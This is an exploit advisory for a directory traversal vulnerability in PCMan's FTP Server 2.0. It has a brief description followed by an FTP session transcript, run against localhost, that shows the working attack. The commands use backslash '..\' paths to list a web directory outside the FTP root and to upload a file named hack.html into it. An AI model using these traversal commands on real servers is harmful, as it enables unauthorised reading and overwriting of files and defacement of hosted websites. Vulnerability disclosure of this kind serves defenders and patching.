#################################################################### # # Exploit Title: PCMan's FTP Server 2.0 Directory Traversal # Date: 2013/6/26 # Exploit Author: Chako # Vendor Homepage: http://pcman.openfoundry.org/ # Software Download Link: https://files.secureserver.net/1sMltFOsytirTG # Version: 2.0 # Tested on: Windows 7 SP1 English # # #################################################################### Description: ===================== A vulnerability has been identified in PCMan's FTP Server 2.0, which allows attackers to read or write(upload,download...etc) arbitrary files. Exploit: ===================== C:\>ftp 127.0.0.1 Connected to 127.0.0.1. 220 PCMan's FTP Server 2.0 Ready. User (127.0.0.1:(none)): chako 331 User name okay, need password. Password: 230 User logged in ftp> dir 200 Command okay. 150 File status okay; Open data connection. -rwxr--r-- 0 ftp ftp 12 Jun 26 01:05 test.txt 226 Data Sent okay. ftp: 54 bytes received in 0.00Seconds 54000.00Kbytes/sec. ftp> dir ../../../../../../../../../web 200 Command okay. 550 File not found or access denied. ftp> dir ..\..\..\..\..\..\..\web 200 Command okay. 150 File status okay; Open data connection. -rwxr--r-- 0 ftp ftp 54 Jun 26 00:40 hello.asp -rwxr--r-- 0 ftp ftp 37 Jun 26 00:07 index.html 226 Data Sent okay. ftp: 111 bytes received in 0.00Seconds 111000.00Kbytes/sec. ftp> put hack.html ..\..\..\..\..\..\..\web\hack.html 200 Command okay. 150 File status okay; Open data connection. 226 Data Sent okay. ftp: 1058 bytes sent in 0.00Seconds 529.00Kbytes/sec. ftp> dir ..\..\..\..\..\..\..\web 200 Command okay. 150 File status okay; Open data connection. -rwxr--r-- 0 ftp ftp 1058 Jun 26 03:53 hack.html -rwxr--r-- 0 ftp ftp 54 Jun 26 00:40 hello.asp -rwxr--r-- 0 ftp ftp 37 Jun 26 00:07 index.html 226 Data Sent okay. ftp: 168 bytes received in 0.00Seconds 168000.00Kbytes/sec. ftp>